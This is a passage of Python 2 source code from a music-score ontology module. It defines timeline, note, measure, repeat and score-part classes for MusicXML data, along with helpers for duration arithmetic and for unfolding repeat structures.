int(e.get('number', -1)) t = e.get('type') if t in ('start', 'crescendo', 'diminuendo'): if len(started[n]) > 0: # print('false start') false_starts.append(e) else: started[n].append(e) elif t == 'stop': if len(started[n]) == 0: # print('false stop') false_stops.append(e) else: es = started[n].pop() matches[es] = e else: raise for ss in started.values(): false_starts.extend(ss) return matches, false_starts, false_stops ``` #### File: extra/data_handling/scoreontology.py ```python import sys import string import re from copy import copy import numpy as np from scipy.interpolate import InterpolatedUnivariateSpline from collections import defaultdict import logging import operator import itertools from numbers import Number from ..utils.lang_utils import cached_property, ComparableMixin, iter_subclasses from ..utils.container_utils import partition # from annotation_tokenizer import parse_words # tokenizer, TokenizeException # the score ontology for longer scores requires a high recursion limit # increase when needed sys.setrecursionlimit(100000) logging.basicConfig() LOGGER = logging.getLogger(__name__) NON_ALPHA_NUM_PAT = re.compile(ur'\W', re.UNICODE) from scipy.interpolate import interp1d # this produces less rounding error than scipy.interpolate.interp1d # def interp1d_old(x, y): # return InterpolatedUnivariateSpline(x, y, k=1) # def my_interp1d(x, y): # def f(x_new): # if not hasattr(x_new, "__len__"): # x_new = np.array([x_new]) # # output values # v = np.empty(len(x_new)) # # insert index # i = np.searchsorted(x, x_new) # same = x[i] == x_new # v[same] = y[i[same]] # if np.sum(same) < len(x_new): # i = i[~same] # v[~same] = y[i-1] + (y[i] - y[i - 1]) * ( x_new[~same] - x[i - 1]) / (x[i] - x[i - 1]) # # np.savetxt('/tmp/nsame.txt', np.column_stack((x_new[~same], x[i-1], x[i], y[i-1], y[i], v[~same])), fmt='%.3f') # return v # return f def kahan_cumsum(x): """ Return the cumsum of a sequence of numbers `x` using the Kahan sum algorithm to bound numerical error. Parameters ---------- x: iterable over numbers A sequence of numbers to be cumsummed Returns ------- ndarray: The cumsum of the elements in `x` """ x = np.asarray(x) cumulator = np.zeros_like(x) compensation = 0.0 cumulator[0] = x[0] for i in range(1, len(x)): y = x[i] - compensation t = cumulator[i - 1] + y compensation = (t - cumulator[i - 1]) - y cumulator[i] = t return cumulator def divide_outside_cumsum(X): """ this computes np.cumsum(np.diff(X[:, 0]) / X[:-1, 1]), but produces less rounding errors when X.dtype = int, by moving the division operation out of the cumsum. """ diff = np.diff(X[:, 0]) num = kahan_cumsum([diff[i] * np.prod(X[:i, 1]) * np.prod(X[i + 1:-1, 1]) for i in range(len(X) - 1)]) den = np.prod(X[:-1, 1]) return num / np.float(den) def _symbolic_to_numeric_duration(symbolic_dur, divs): label_durs = { 'long': 16, 'breve': 8, 'whole': 4, 'half': 2, 'quarter': 1, 'eighth': 1./2, '16th': 1./4, '32nd': 1./8., '64th': 1./16, '128th': 1./32, '256th': 1./64 } dot_multipliers = (1, 1 + 1./2, 1 + 3./4, 1 + 7./8) numdur = divs * label_durs[symbolic_dur.get('type', 'quarter')] numdur *= dot_multipliers[symbolic_dur.get('dots', 0)] numdur *= float(symbolic_dur.get('normal_notes', 1)) / symbolic_dur.get('actual_notes', 1) return numdur def symbolic_to_numeric_duration(symbolic_durs, divs): numdur = 0 for symbolic_dur in symbolic_durs: numdur += _symbolic_to_numeric_duration(symbolic_dur, divs) return numdur # def preprocess_direction_name(l): # try: # to_remove = set(('COMMA','CARLOSCOMMENT', 'PARENOPEN', 'PARENCLOSE', 'TEMPOHINT')) # tokens = tokenizer.tokenize(l) # parts = [] # for t in tokens: # if t.type in ('ROMAN_NUMBER', 'TEMPOHINT', 'PRIMO'): # parts.append(t.value) # elif t.type in to_remove: # continue # else: # parts.append(t.type.lower()) # return '_'.join(parts) # except TokenizeException as e: # return l.lower().replace(' ', '_') # def preprocess_direction_fallback(l): # """ # try to convert direction name into a normalized form; some # translation takes place to correct for common abbreviations # (e.g. rall. for rallentando), and OCR errors; furthermore the # string will be converted to lowercase and spaces are replaced by # underscores # this function is obsolete and should only be used if the ply module is not available # Parameters # ---------- # l : str # a direction name # Returns # ------- # str # a string containing the processed version of `l` # """ # # TODO: # # Lento Sostenuto -> lento # # poco rall. -> rallentando # # poco ritenuto -> ritenuto # # pp e poco ritenuto -> ritenuto # # for simplicity of equiv replacements, # # do more normalization: # # lkey = ln.replace(',._-','') # lsl = l.strip().lower() # lkey = NON_ALPHA_NUM_PAT.sub(ur'', lsl) # # print(r, l) # # tr = string.ascii_lowercase + '_' # # delete_table = string.maketrans(tr, ' ' * len(tr)) # # ln = l.strip().lower() # # lkey = ln.translate(None, delete_table) # equivalences = {u'dim': u'diminuendo', # u'dimin': u'diminuendo', # u'diminuend': u'diminuendo', # u'diminuendosempre': u'diminuendo', # u'dirn': u'diminuendo', # OCR errors # u'cresc': u'crescendo', # u'cre': u'crescendo', # u'ten': u'tenuto', # u'cr': u'crescendo', # u'rall': u'rallentando', # u'espress': u'espressivo', # u'pocoritenuto': u'ritenuto', # u'pocoriten': u'ritenuto', # u'pocorubato': u'ritardando', # u'pocorall': u'rallentando', # u'pocorallentando': u'rallentando', # u'pizz': u'pizzicato', # u'atenepo': u'a_tempo', # u'rallentandomolto': u'rallentando', # u'appasionato': u'appassionato', # u'legatissizno': u'legatissimo', # u'rallent': u'rallentando', # u'rallent': u'rallentando', # u'rit': u'ritardando', # u'ritpocoapoco': u'ritardando', # u'ritard': u'ritardando', # u'riten': u'ritenuto', # u'rinf': u'rinforzando', # u'rinforz': u'rinforzando', # u'smorz': u'smorzando', # u'tenute': u'tenuto', # u'pi\xf9_lento': u'piu_lento' # } # # print('lkey', lkey, equivalences.get(lkey)) # return equivalences.get(lkey, NON_ALPHA_NUM_PAT.sub(ur'_', lsl)) class TimeLine(object): """ The `TimeLine` class collects `TimePoint` objects in a doubly linked list fashion (as well as in an array). Once all `TimePoint` objects have beed added, the TimeLine can be locked (that is, no more `TimePoint` objects can be added), in order to allow for caching of property values (without locking the correctness of the cached values cannot be guaranteed) Parameters ---------- No parameters Attributes ---------- points : numpy array of TimePoint objects a numpy array of TimePoint objects. locked : boolean if the timeline is locked, no points can be added until `unlock()` is called. """ def __init__(self): self.points = np.array([], dtype=TimePoint) self.locked = False def lock(self): """ lock the time line; no points can be added until `unlock` is called """ self.locked = True def unlock(self): """ unlock the time line; points can be added until `lock` is called """ self.locked = False def link(self): """ double link all points in the time line """ for i in range(len(self.points) - 1): self.points[i].next = self.points[i + 1] self.points[i + 1].prev = self.points[i] def add_point(self, tp): """ add `TimePoint` object `tp` to the time line """ if self.locked: LOGGER.warning('Attempt to mutate locked TimeLine object') else: N = len(self.points) i = np.searchsorted(self.points, tp) if not (i < N and self.points[i].t == tp.t): self.points = np.insert(self.points, i, tp) if i > 0: self.points[i - 1].next = self.points[i] self.points[i].prev = self.points[i - 1] if i < len(self.points) - 1: self.points[i].next = self.points[i + 1] self.points[i + 1].prev = self.points[i] def get_point(self, t): """ return the `TimePoint` object with time `t`, or None if there is no such object """ N = len(self.points) i = np.searchsorted(self.points, TimePoint(t)) if i < N and self.points[i].t == t: return self.points[i] else: return None def get_or_add_point(self, t): """ return the `TimePoint` object with time `t`; if there is no such object, create it, add it to the time line, and return it :param t: time value `t` (float) :returns: a TimePoint object with time `t` """ tp = self.get_point(t) if tp is None: tp = TimePoint(t) self.add_point(tp) return tp def add_starting_object(self, t, o): """ add object `o` as an object starting at time `t` """ self.get_or_add_point(t).add_starting_object(o) def add_ending_object(self, t, o): """ add object `o` as an object ending at time `t` """ self.get_or_add_point(t).add_ending_object(o) def get_all_of_type(self, cls, start=None, end=None, include_subclasses=False): """ return all objects of type `cls` """ if start is not None: if not isinstance(start, TimePoint): start = TimePoint(start) start_idx = np.searchsorted( self.points, start, side='left') else: start_idx = 0 if end is not None: if not isinstance(end, TimePoint): end = TimePoint(start) end_idx = np.searchsorted(self.points, end, side='left') else: end_idx = len(self.points) r = [] for tp in self.points[start_idx: end_idx]: r.extend(tp.get_starting_objects_of_type(cls, include_subclasses)) return r class TimePoint(ComparableMixin): """ A TimePoint represents an instant in Time. Parameters ---------- t : number Time point of some event in/element of the score, where the unit of a time point is the <divisions> as defined in the musicxml file, more precisely in the corresponding score part. Represents the absolute time of the time point, also used for ordering TimePoint objects w.r.t. each other. label : str, optional. Default: '' Attributes ---------- t : number label : str starting_objects : dictionary a dictionary where the musical objects starting at this time are grouped by class. ending_objects : dictionary a dictionary where the musical objects ending at this time are grouped by class. * `prev`: the preceding time instant (or None if there is none) * `next`: the succeding time instant (or None if there is none) The `TimeLine` class stores sorted TimePoint objects in an array under TimeLine.points, as well as doubly linked (through the `prev` and `next` attributes). The `TimeLine` class also has functionality to add, remove, lock, and unlock the TimePoints. """ def __init__(self, t, label=''): self.t = t self.label = label self.starting_objects = defaultdict(list) self.ending_objects = defaultdict(list) def __iadd__(self, value): assert isinstance(value, Number) self.t += value return self def __isub__(self, value): assert isinstance(value, Number) self.t -= value return self def __add__(self, value): assert isinstance(value, Number) new = copy(self) new += value return new def __sub__(self, value): assert isinstance(value, Number) new = copy(self) new -= value return new def __unicode__(self): return u'Timepoint {0}: {1}'.format(self.t, self.label) def add_starting_object(self, obj): """ add object `obj` to the list of starting objects """ obj.start = self self.starting_objects[type(obj)].append(obj) def add_ending_object(self, obj): """ add object `obj` to the list of ending objects """ obj.end = self self.ending_objects[type(obj)].append(obj) def get_starting_objects_of_type(self, otype, include_subclasses=False): """ return all objects of type `otype` that start at this time point """ if include_subclasses: return self.starting_objects[otype] + \ list(itertools.chain(*(self.starting_objects[subcls] for subcls in iter_subclasses(otype)))) else: return self.starting_objects[otype] def get_ending_objects_of_type(self, otype, include_subclasses=False): """ return all objects of type `otype` that end at this time point """ if include_subclasses: return self.ending_objects[otype] + \ list(itertools.chain(*(self.ending_objects[subcls] for subcls in iter_subclasses(otype)))) else: return self.ending_objects[otype] def get_prev_of_type(self, otype, eq=False): """ return the object(s) of type `otype` that start at the latest time before this time point (or at this time point, if `eq` is True) """ if eq: value = self.get_starting_objects_of_type(otype) if len(value) > 0: return value[:] return self._get_prev_of_type(otype) def _get_prev_of_type(self, otype, eq=False): if self.prev is None: return [] else: r = self.prev.get_starting_objects_of_type(otype) if r != []: return r[:] else: return self.prev._get_prev_of_type(otype) def get_next_of_type(self, otype, eq=False): """ return the object(s) of type `otype` that start at the earliest time after this time point (or at this time point, if `eq` is True) """ if eq: value = self.get_starting_objects_of_type(otype) if len(value) > 0: return value[:] return self._get_next_of_type(otype) def _get_next_of_type(self, otype, eq=False): if self.next is None: return [] else: r = self.next.get_starting_objects_of_type(otype) if r != []: return r[:] else: return self.next._get_next_of_type(otype) @cached_property def next(self): """ return the next time point, or None if there is no such object; this property will be set when the object is part of a time line """ return None @cached_property def prev(self): """ return the previous time point, or None if there is no such object; this property will be set when the object is part of a time line """ return None def _cmpkey(self): """ This method returns the value to be compared (code for that is in the ComparableMixin class) """ return self.t __hash__ = _cmpkey # shorthand? class TimedObject(object): """ class that represents objects that (may?) have a start and ending point. TO DO: check! Used as super-class for classes representing different types of objects in a (printed) score. """ def __init__(self): self.start = None self.end = None # intermediate time points self.intermediate = [] class Page(TimedObject): def __init__(self, nr=0): super(Page, self).__init__() self.nr = nr def __unicode__(self): return u'page {0}'.format(self.nr) class System(TimedObject): def __init__(self, nr=0): super(System, self).__init__() self.nr = nr def __unicode__(self): return u'system {0}'.format(self.nr) class Slur(TimedObject): """ Parameters ---------- voice : number the voice the slur corresponds to, this is given by a <voice>number_of_voice</voice> tag inside <note> ... </note>. """ def __init__(self, voice): super(Slur, self).__init__() self.voice = voice def __unicode__(self): return u'slur at voice {0} (ends at {1})'.format(self.voice, self.end and self.end.t) class Repeat(TimedObject): def __init__(self): super(Repeat, self).__init__() def __unicode__(self): return u'Repeat (from {0} to {1})'.format(self.start and self.start.t, self.end and self.end.t) class DaCapo(TimedObject): def __init__(self): super(DaCapo, self).__init__() def __unicode__(self): return u'Dacapo' # (at {0} to {1})'.format(self.start.t, self.end.t) class Fine(TimedObject): def __init__(self): super(Fine, self).__init__() def __unicode__(self): return u'Fine' class Fermata(TimedObject): def __init__(self): super(Fermata, self).__init__() def __unicode__(self): return u'Fermata' class Ending(TimedObject): """ Object that represents one part of a 1---2--- type ending of a musical passage (aka Volta brackets). """ def __init__(self, number): super(Ending, self).__init__() self.number = number def __unicode__(self): return u'Ending (from {0} to {1})'.format(self.start.t, self.end.t) class Measure(TimedObject): """ Attributes ---------- number : number the number of the measure. (directly taken from musicxml file?) page : system : upbeat : boolean """ def __init__(self): super(Measure, self).__init__() self.number = None self.page = None self.system = None def __unicode__(self): return u'measure {0} at page {1}, system {2}'.format(self.number, self.page, self.system) def get_measure_duration(self, quarter=False): """ Parameters ---------- quarter : ????, optional. Default: False Returns ------- """ assert self.start.next is not None, LOGGER.error( 'Measure has no successor') divs = self.start.next.get_prev_of_type(Divisions) ts = self.start.next.get_prev_of_type(TimeSignature) nextm = self.start.get_next_of_type(Measure) assert len(divs) > 0 assert len(ts) > 0 assert len(nextm) > 0 measure_dur = nextm[0].start.t - self.start.t beats = ts[0].beats beat_type = ts[0].beat_type div = float(divs[0].divs) if quarter: return measure_dur / div else: return beat_type * measure_dur / (4. * div) @property def upbeat(self): """Returns True if the duration of the measure is equal to the expected duration (based on divisions and time signature). NOTE: What does "expected duration" refer to here? WARNING: this property does not work reliably to detect incomplete measures in the middle of the piece Returns ------- boolean """ assert self.start.next is not None, LOGGER.error( 'ScorePart is empty') divs = self.start.next.get_prev_of_type(Divisions) ts = self.start.next.get_prev_of_type(TimeSignature) nextm = self.start.get_next_of_type(Measure) invalid = False if len(divs) == 0: LOGGER.warning('ScorePart specifies no divisions') invalid = True if len(ts) == 0: LOGGER.warning('ScorePart specifies no time signatures') invalid = True if len(nextm) == 0: LOGGER.warning('ScorePart has just one measure') invalid = True if invalid: LOGGER.warning( 'upbeat could not be determined properly, assuming no upbeat') return False measure_dur = nextm[0].start.t - self.start.t beats = ts[0].beats beat_type = ts[0].beat_type div = float(divs[0].divs) # this will return a boolean, so either True or False return beat_type * measure_dur / (4 * div * beats) % 1.0 > 0.0 class TimeSignature(TimedObject): """ Parameters ---------- beats : beat_type : """ def __init__(self, beats, beat_type): super(TimeSignature, self).__init__() self.beats = beats self.beat_type = beat_type def __unicode__(self): return u'time signature: {0}/{1}'.format(self.beats, self.beat_type) class Divisions(TimedObject): """ represents <divisions>xxx</divisions> that are used inside a measure to set the length of a quarter note (xxx here is the value for a quarter note, e.g. 256). This element usually is present in the first measure of each score part. """ def __init__(self, divs): super(Divisions, self).__init__() self.divs = divs def __unicode__(self): return u'divisions: quarter={0}'.format(self.divs) class Tempo(TimedObject): def __init__(self, bpm): super(Tempo, self).__init__() self.bpm = bpm def __unicode__(self): return u'tempo: bpm={0}'.format(self.bpm) class KeySignature(TimedObject): """ Parameters ---------- fifths : mode : """ def __init__(self, fifths, mode): super(KeySignature, self).__init__() self.fifths = fifths self.mode = mode def __unicode__(self): return u'key signature: fifths={0}, mode={1}'.format(self.fifths, self.mode) class Transposition(TimedObject): """ represents a <transpose> tag that tells how to change all (following) pitches of that part to put it to concert pitch (i.e. sounding pitch). Parameters ---------- diatonic : number chromatic : number the number of semi-tone steps to add or subtract to the pitch to get to the (sounding) concert pitch. """ def __init__(self, diatonic, chromatic): super(Transposition, self).__init__() self.diatonic = diatonic self.chromatic = chromatic def __unicode__(self): return u'transposition: diatonic={0}, chromatic={1}'.format(self.diatonic, self.chromatic) class Words(TimedObject): """ Parameters ---------- text : str """ def __init__(self, text): super(Words, self).__init__() self.text = text def __str__(self): return self.__unicode__().encode('utf8') def __unicode__(self): return u'{}: {}'.format(type(self).__name__, self.text) class Direction(TimedObject): """ """ # labels = [] # patterns = [] def __init__(self, text): self.text = text self.start = None self.end = None def __str__(self): return self.__unicode__().encode('utf8') def __unicode__(self): return u'{}: {}'.format(type(self).__name__, self.text) class TempoDirection(Direction): pass class DynamicTempoDirection(TempoDirection): def __init__(self, text): Direction.__init__(self, text) self.intermediate = [] class ConstantTempoDirection(TempoDirection): pass class ResetTempoDirection(ConstantTempoDirection): pass class LoudnessDirection(Direction): pass class DynamicLoudnessDirection(LoudnessDirection): def __init__(self, text): Direction.__init__(self, text) self.intermediate = [] class ConstantLoudnessDirection(LoudnessDirection): pass class ImpulsiveLoudnessDirection(LoudnessDirection): pass class Note(TimedObject): """ represents a note. Parameters ---------- step : str the basic pitch class, like 'C', 'D', 'E', etc. alter: integer number of semi-tones to alterate the note from its basic pitch given by `step`. Note that the musicxml standard in principle allows for this to be a float number for microtones (micro-intonation). In Midi this would/could then translate to a pitch-bend. octave : integer the octave where octave 4 is the one having middle C (C4). voice : integer, optional. Default: None id : integer, optional. Default: None ... Attributes ---------- previous_notes_in_voice : simultaneous_notes_in_voice : next_notes_in_voice : midi_pitch : integer morphetic_pitch : alter_sign : duration : """ def __init__(self, step, alter, octave, voice=None, id=None, symbolic_duration=None, grace_type=None, steal_proportion=None, staccato=False, fermata=False, accent=False, coordinates=None, staff=None): super(Note, self).__init__() self.step = step if alter not in (None, 0, 1, 2, 3, -1, -2, 3): print('alter', step, alter, octave) raise Exception() if alter == 0: alter = None self.alter = alter self.octave = octave self.voice = voice self.id = id self.grace_type = grace_type self.steal_proportion = steal_proportion self.staccato = staccato self.fermata = fermata self.accent = accent self.staff = staff self.coordinates = coordinates self.symbolic_durations = [] if symbolic_duration is not None: self.symbolic_durations.append(symbolic_duration) @property def previous_notes_in_voice(self): n = self while True: nn = n.start.get_prev_of_type(Note) if nn == []: return nn else: voice_notes = [m for m in nn if m.voice == self.voice] if len(voice_notes) > 0: return voice_notes n = nn[0] @property def simultaneous_notes_in_voice(self): return [m for m in self.start.starting_objects[Note] if m.voice == self.voice and m != self] @property def next_notes_in_voice(self): n = self while True: nn = n.start.get_next_of_type(Note) if nn == []: return nn else: voice_notes = [m for m in nn if m.voice == self.voice] if len(voice_notes) > 0: return voice_notes n = nn[0] @property def midi_pitch(self): """ the midi pitch value of the note (MIDI note number). C4 (middle C, in german: c') is note number 60. Returns ------- integer the note's pitch as MIDI note number. """ base_class = {'c': 0, 'd': 2, 'e': 4, 'f': 5, 'g': 7, 'a': 9, 'b': 11}[self.step.lower()] + (self.alter or 0) return (self.octave + 1) * 12 + base_class @property def morphetic_pitch(self): """ the morphetic value of the note, i.e. a single integer. It corresponds to the (vertical) position of the note in the barline system. Returns ------- integer """ base_class = {'c': 0, 'd': 1, 'e': 2, 'f': 3, 'g': 4, 'a': 5, 'b': 6}[self.step.lower()] octave_number = {0: 32, 1: 39, 2: 46, 3: 53, 4: 60, 5: 67, 6: 74, 7: 81, 8: 89}[self.octave] return octave_number + base_class @property def alter_sign(self): """ the alteration of the note Returns ------- str """ return {None: ' ', 1: '#', 2: 'x', -1: 'b', -2: 'bb'}[self.alter] @property def duration(self): """ the duration of the note in divisions Returns ------- number """ try: return self.end.t - self.start.t except: LOGGER.warn('no end time found for note') return 0 @property def duration_from_symbolic(self): divs = self.start.get_prev_of_type(Divisions, True) if len(divs) == 0: div = 1 else: div = divs[0].divs # TODO: it is theoretically possible that the divisions change # in between tied notes. The current assumes this does not happen. return symbolic_to_numeric_duration(self.symbolic_durations, div) def __unicode__(self): return u'{0}{1}{2} ({8}-{9}, midi: {3}, duration: {5}, voice: {4}, id: {6}, {7})'\ .format(self.alter_sign, self.step, self.octave, self.midi_pitch, self.voice, self.duration, self.id or '', self.grace_type if self.grace_type else '', self.start and self.start.t, self.end and self.end.t) def get_all_score_parts(constituents): """ From a list whose elements are either ScorePart objects or PartGroup objects, return an ordered list of ScorePart objects. Parameters: ----------- constituents : iterable a list of ScorePart/PartGroup objects Returns: -------- iterable a list of all ScorePart objects embedded in `constituents` """ return [score_part for constituent in constituents for score_part in ((constituent,) if isinstance(constituent, ScorePart) else get_all_score_parts(constituent.constituents))] class PartGroup(object): """ represents a <part-group ...> </...> where instruments are grouped. Note that a part grouped is "started" and "stopped" with according attributes inside the respective elements. Parameters ---------- grouping_symbol : str OR None, optional the symbol used for grouping instruments, a <group-symbol> element, possibilites are: - 'brace' (opening curly brace, should group 2 same instruments, e.g. 2 horns, or left + right hand on piano) - 'square' (opening square bracket, should have same function as the brace.) - 'bracket' (opening square bracket, should group instruments of the same category, such as all woodwinds.) Note that there is supposed to be a hierarchy between these, like this: a bracket is supposed to embrace one ore multiple braces or squares. Attributes ---------- grouping_symbol : str OR None constituents : list of PartGroup objects parent : number : score_parts : list of ScorePart objects a list of all ScorePart objects in this PartGroup """ def __init__(self, grouping_symbol=None, name=None): self.grouping_symbol = grouping_symbol self.constituents = [] self.name = name self.parent = None self.number = None @property def score_parts(self): return get_all_score_parts(self.constituents) def pprint(self, l=0): if self.name is not None: name_str = u' / {0}'.format(self.name) else: name_str = u'' s = [u' ' * l + u'{0}{1}'.format(self.grouping_symbol, name_str)] for ch in self.constituents: s.append(ch.pprint(l + 1)) return u'\n'.join(s) class ScoreVariant(object): def __init__(self, start_time=0): self.t_unfold = start_time self.segments = [] def add_segment(self, start, end): self.segments.append((start, end, self.t_unfold)) self.t_unfold += (end.t - start.t) def get_segments(self): """return segment (start, end, offset) information for each of the segments in the score variant. PHENICX NOTE: these numbers can be inserted directly into the ScoreVariantSequence table, as "ScoreStartBeat", "ScoreStopBeat", and "Offset", respectively """ return [(s.t, e.t, 0 if i > 0 else o) for i, (s, e, o) in enumerate(self.segments)] def clone(self): clone = ScoreVariant(self.t_unfold) clone.segments = self.segments[:] return clone class ScorePart(object): """ Represents a whole score part, e.g. all notes of one single instrument or 2 instruments written in the same staff. Note that there may be more than one staff per score part; vice versa, in the printed score, there may be more than one score part's notes in the same staff (such as two flutes in one staff, etc). Parameters ---------- part_id : str the id of the part (<score-part id="P1">), will look like 'P1' for part 1, etc. tl : TimeLine object OR None, optional Attributes ---------- part_id : str timeline : TimeLine object part_name : str as taken from the musicxml file part_abbreviation : str as taken from the musicxml file notes : notes_unfolded : beat_map : scipy interpolate interp1d object the timeline on a beat basis, i.e. defined on the currently present time signature's denominator (may vary throughout the score). Each timepoint of the timeline is expressed as a (fraction) of a beat number. quarter_map : scipy interpolate interp1d object the timeline on a quarter note basis. Each timepoint of the timeline is be expressed as a (fraction of) a quarter note. """ def __init__(self, part_id, tl=None): self.part_id = part_id self.timeline = TimeLine() if tl is None else tl self.parent = None self.part_name = None self.part_abbreviation = None @property def part_names(self): # get instrument name parts recursively chunks = [] if self.part_name is not None: chunks.append(self.part_name) yield self.part_name part = self.parent while part is not None: if part.name is not None: chunks.insert(0, part.name) yield u' '.join(chunks) part = part.parent def make_score_variants(self): """ Create a list of ScoreVariant objects, each representing a distinct way to unfold the score, based on the repeat structure. Parameters ---------- Returns ------- """ LOGGER.warning(('Generation of repeat structures involving da ' 'capo/fine/coda/segno directions is not (properly) ' 'implemented yet')) import pdb # pdb.set_trace() repeats = self.timeline.get_all_of_type(Repeat) # t_score is used to keep the time in the score t_score = TimePoint(0) # the last time instance in the piece end_point = self.timeline.points[-1] # t_unfold is used to keep the time in the score variant # t_unfold = 0 # times will aggregate the triples that make up the result times = [] # flag that tells... if we've reached a "da capo" sign in the # score reached_dacapo = False svs = [ScoreVariant()] # each repeat holds start and end time of a score interval to # be repeated for repeat in repeats: new_svs = [] for sv in svs: # is the start of the repeat after our current score # position? if repeat.start > t_score: # yes: add the tuple (t_score, repeat.start) to the # result this is the span before the interval that is # to be repeated # times.append((t_score, repeat.start, t_unfold)) sv.add_segment(t_score, repeat.start) # get any "endings" (e.g. 1 / 2 volta) of the repeat # (there are not supposed to be more than one) endings = repeat.end.get_ending_objects_of_type(Ending) # create a new ScoreVariant for the repetition (sv # will be the score variant where this repeat is # played only once) new_sv = sv.clone() # is there an ending? if len(endings) > 0: # yes ending = endings[0] # add the first occurrence of the repeat sv.add_segment(repeat.start, ending.start) # we are in the second iteration of the repeat, so # only add the interval of the repeat up to the ending # (rather than up to the end of the repeat) # add the first occurrence of the repeat new_sv.add_segment(repeat.start, repeat.end) new_sv.add_segment(repeat.start, ending.start) else: # add the first occurrence of the repeat sv.add_segment(repeat.start, repeat.end) # no: add the full interval of the repeat (the second time) new_sv.add_segment(repeat.start, repeat.end) new_sv.add_segment(repeat.start, repeat.end) # this repeat has been handled, update the score time t_score = repeat.end # add both score variants new_svs.append(sv) new_svs.append(new_sv) svs = new_svs # are we at the end of the piece already? if t_score < end_point: # no, append the interval from the current score # position to the end of the piece for sv in svs: sv.add_segment(t_score, end_point) return svs def test_timeline(self): """ Test if all ending objects have occurred as starting object as well. """ s = set() for tp in self.timeline.points: for k, oo in tp.starting_objects.items(): for o in oo: s.add(o) for k, oo in tp.ending_objects.items(): for o in oo: assert o in s s.remove(o) LOGGER.info('Timeline is OK') def _make_repeat_structure(self): """ Return a list of sequence times based on the repeat structure of the piece, that can be used to create an unfolded timeline. Returns ------- list A list of triples (s, e, o), where s is the score start time of a segment, e is the score end time of a segment, and o is the absolute (score variant) start time of that segment in the unfolded score """ LOGGER.warning('Generation of repeat structures involving da' ' capo/fine/coda/segno directions is not (properly)' ' implemented yet') repeats = self.timeline.get_all_of_type(Repeat) dacapos = self.timeline.get_all_of_type(DaCapo) fines = self.timeline.get_all_of_type(Fine) if len(dacapos) > 0: dacapo = dacapos[0] else: dacapo = None if len(fines) > 0: fine = fines[0] else: fine = None # t_score is used to keep the time in the score t_score = TimePoint(0) # the last time instance in the piece end_point = self.timeline.points[-1] # t_unfold is used to keep the time in the score variant t_unfold = 0 # times will aggregate the triples that make up the result times = [] # flag that tells... if we've reached a "da capo" sign in the # score reached_dacapo = False # each repeat holds start and end time of a score interval to # be repeated for repeat in repeats: # is the start of the repeat after our current score # position? if repeat.start > t_score: # yes: add the tuple (t_score, repeat.start) to the # result this is the span before the interval that is # to be repeated times.append((t_score, repeat.start, t_unfold)) # increase t_unfold by the interval [t_score, # repeat.start] t_unfold += (repeat.start.t - t_score.t) # add the first occurrence of the repeat times.append((repeat.start, repeat.end, t_unfold)) # update t_unfold accordingly t_unfold += (repeat.end.t - repeat.start.t) # is there a da capo within the repeat interval? if dacapo is not None and repeat.start < dacapo.start <= repeat.end: # yes: set the reached_dacapo flag reached_dacapo = True # play the second time only up to the da capo, and # stop processing further repeats times.append((repeat.start, dacapo.start, t_unfold)) # update t_unfold accordingly t_unfold += (dacapo.start.t - repeat.start.t) break # get any "endings" (e.g. 1 / 2 volta) of the repeat # (there are not supposed to be more than one) endings = repeat.end.get_ending_objects_of_type(Ending) # is there an ending? if len(endings) > 0: # yes ending = endings[0] # we are in the second iteration of the repeat, so # only add the interval of the repeat up to the ending # (rather than up to the end of the repeat) times.append((repeat.start, ending.start, t_unfold)) # update t_unfold accordingly t_unfold += (ending.start.t - repeat.start.t) else: # no: add the full interval of the repeat (the second time) times.append((repeat.start, repeat.end, t_unfold)) # update t_unfold accordingly t_unfold += (repeat.end.t - repeat.start.t) # this repeat has been handled, update the score time t_score = repeat.end # are we at a da capo sign? if reached_dacapo: # yes; is there a fine? if fine is not None: # yes # get the notes starting at the fine sign notes = fine.start.get_starting_objects_of_type(Note) # TODO: the following appears to be incorrect, the # musicxml spec says the fine *follows* the last notes # to be played, so the end point should always be the # time instance of the fine sign, unless otherwise stated: # TODO: if "fine" is a number, treat it as the quarter # duration that all final notes are supposed to have, # rather than have all the notes keep their own # duration # are there any notes starting at the fine sign? if len(notes) > 0: # yes: get the off times off_times = np.array([n.end.t for n in notes]) # set the end point of the next interval to the # latest off time end_point = notes[np.argmax(off_times)].end else: # no: set the end point of the next interval to # the time of the fine sign end_point = fine.start # add the interval from the start of the piece to # end_point, which is either: # 1. the end of the piece (no fine sign) # 2. the time of the fine sign (no notes start at fine sign) # 3. the offset of the longest note played at a fine sign (notes # start at fine sign) times.append((self.timeline.points[0], end_point, t_unfold)) else: # not at a da capo sign # are we at the end of the piece already? if t_score < end_point: # no, append the interval from the current score # position to the end of the piece times.append((t_score, end_point, t_unfold)) # for s, e, o in times: # print(s.t, e.t, o) return times def unfold_timeline(self): """ Return a new TimeLine, where all repeat structures are unfolded. This includes 1/2 endings (volta brackets), and Da Capo al Fine structures. In this new timeline, both the timepoints and the musical objects are copied to unfold the structure. Note that the ID attributes of the musical objects are copied along, so these ID's will not be unique (but the duplicate ID's may be useful to identify which objects are duplicates of which). Returns ------- tl : TimeLine object A TimeLine object containing the unfolded timepoints """ self.test_timeline() new_timeline = [] ending_objects_tmp = defaultdict(list) def add_points_between(start, end, offset, prev_ending_objects, object_map, include_end=False): # print('add_points_between',start.t, end.t, offset, include_end) end_operator = operator.le if include_end else operator.lt point_idx = np.logical_and( operator.ge(self.timeline.points, start), end_operator(self.timeline.points, end)) # make a copy of all timepoints in the selected range new_points = np.array([copy(x) for x in self.timeline.points[point_idx]]) for i, tp in enumerate(new_points): # let the range start at offset tp.t = tp.t - start.t + offset # make a copy of all starting objects, for the new # objects, set the start attribute to the new # timepoint, and set the new objects to be the # starting objects of the new timepoint new_starting = defaultdict(list) for k, objects in tp.starting_objects.items(): new_objects = [copy(o) for o in objects] for o in new_objects: o.start = tp object_map.update(zip(objects, new_objects)) new_starting[k] = new_objects tp.starting_objects = new_starting if i > 0: new_ending = defaultdict(list) for k, objects in tp.ending_objects.items(): new_objects = [object_map[o] for o in objects] for o in new_objects: o.end = tp new_ending[k] = new_objects tp.ending_objects = new_ending if len(new_points) > 0: # print('setting ending objects from last repeat:') # print(new_points[0].t) new_points[0].ending_objects = prev_ending_objects for k, oo in prev_ending_objects.items(): for o in oo: o.end = new_points[0] ending_objects_copy = defaultdict(list) for k, oo in end.ending_objects.items(): ending_objects_copy[k] = [object_map[o] for o in oo] return new_points, ending_objects_copy, object_map o_map = {} segments = self._make_repeat_structure() N = len(segments) for i, (start, end, offset) in enumerate(segments): include_end = i == N - 1 new_points, ending_objects_tmp, o_map = \ add_points_between( start, end, offset, ending_objects_tmp, o_map, include_end) 